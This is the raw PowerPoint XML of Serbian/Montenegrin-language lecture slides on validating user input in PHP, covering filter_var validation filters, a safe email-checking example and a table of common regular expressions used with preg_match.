              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrijednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>proverava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drugi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>predstavlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kriterijume</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>proveru</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Sledeća</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tabela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>predstavlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>najčešće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korišćene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kriterijume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endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sr-Latn-M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F6FD09-32B9-4DBF-9EF1-E1B55A4C5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810000"/>
            <a:ext cx="8543925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pt-BR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filter_var($var, $filter);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3651680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CFA62-15F4-4409-8A1F-6478FFD78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Kriterijumi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>kod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>filtar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>funkcija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0320F5-86A6-416A-ABAD-125D405DB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US" b="0" dirty="0" err="1"/>
              <a:t>Primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ispod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prikazuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pravilnu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>validaciju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>adrese</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Takođe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>predstavlja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rješenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pređašnji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>primjer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je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>omogućavao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>slanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>masovnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> SPAM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>poruka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0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2AC62EE-8E1A-45CF-A08A-435BEB5E34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6209798"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="571500" y="1066800"/>
          <a:ext cx="8001000" cy="2468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>
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3097718040"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5105400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20208329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2000" b="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Filter</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2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2000" b="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Opis</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2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3029405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FILTER_VALIDATE_EMAIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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email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adrese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1962459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FILTER_VALIDATE_INT</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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brojnih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vrijednosti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opcijama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min_range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max_range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1309151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FILTER_VALIDATE_IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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IP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adrese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206339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FILTER_VALIDATE_URL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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ispravne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URL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adrese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1022215390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E571D912-EBB7-4C1E-A458-AE5B8FCD5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237" y="4495800"/>
            <a:ext cx="8543925" cy="22082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&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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$email = $_POST['email'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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if(filter_var($email, FILTER_VALIDATE_EMAIL)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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// sada je sigurno poslati mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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7555499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25A97-7DD6-4EE5-A1A2-8713E7A4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Regularni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (regular expression, regex)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14A14-1529-42C2-9673-519927D68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r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Regularni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izrazi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skup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pravila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se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršavaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>određenim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podacima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cilju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>identifikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karaktera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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>znakovnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>skupova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nekom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tekstualnom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>objektu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Regularne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izraze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koriste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>programski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jezici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Imaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>relativno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dobre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>performanse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široku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>primenjivost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Sledeća</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tabela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prikazuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>često</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korišćene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koriste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>regularne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izraze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB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4912496A-5CFA-4563-86DC-AE8A8424F5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908267"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="647700" y="4159567"/>
          <a:ext cx="7962900" cy="2194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960984708"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5334000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="42526609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Funkcija</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Opis</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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671728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preg_match</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="18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Izvršava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regex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provjeru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nad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podacima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1305381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preg_match_all</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="18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Pretražuje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podatke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osnovu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regex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postavlja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rezultate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niz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osnovu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zadatih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pravila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2040066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800" b="0" dirty="0" err="1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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>preg_replace</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1800" b="0" dirty="0"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Pretražuje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podatke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osnovu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regex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pogotke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zamenjuje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drugim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podacima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2718704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7358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37A25-887A-409B-9270-F47BDF185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Regularni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (regular expression, regex)…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9702A-6B26-48A7-BEDF-B347ECCF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r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Pošto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>regularni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izrazi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njihovo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcionisanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kursa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>biće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prikazani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>najšeće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korišćeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>provjeri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: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Na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sledećem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>slajdu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dati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>često</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korišćeni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par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zanimljivih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>regularnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izraza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" b="0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0D64A4-BC31-475A-B53D-636159F4F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2206625"/>
            <a:ext cx="8401050" cy="2133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&lt;?php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altLang="sr-Latn-R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izraz</a:t>
            </a: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za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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proveru</a:t>
            </a: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email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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adrese</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-R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$regex = '/^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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zA</a:t>
            </a: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-Z]{2,6}$/';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en-GB" altLang="sr-Latn-R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preg_match</a:t>
            </a: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($regex, $email)) {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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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ispavna</a:t>
            </a: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email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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adresa</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-R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>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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14835073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FC4F8-3DB1-41AB-B352-5C9834AB1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Regularni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (regular expression, regex)…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3E8F5-CFDB-4F84-A232-D125366DC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4725" y="1266031"/>
            <a:ext cx="7194550" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>Tabela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>često</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>korišćenih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>regularnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>izraza</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/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4C21082-ADD4-41C3-A180-DDA12B11E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533574"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="571500" y="1905000"/>
          <a:ext cx="8001000" cy="2746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625545070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24986078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Izraz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="24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Opis</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="24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4025109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/^[a-z]*$/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Sva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mala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slova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intervalu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slova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 do z</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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3871554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/^[a-zA-Z0-9]*$/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Slovni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brojni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znakovi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(mala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velika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slova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brojevi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GB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2313105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/^[a-fA-F0-9]{32}$/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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md5 hash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vrijednosti</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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1083366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/^(5[1-5][0-9]{14})*$/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Master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kreditne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kartice</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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1620936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b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="555555"/>
                          </a:solidFill>
                          <a:effectLst/>
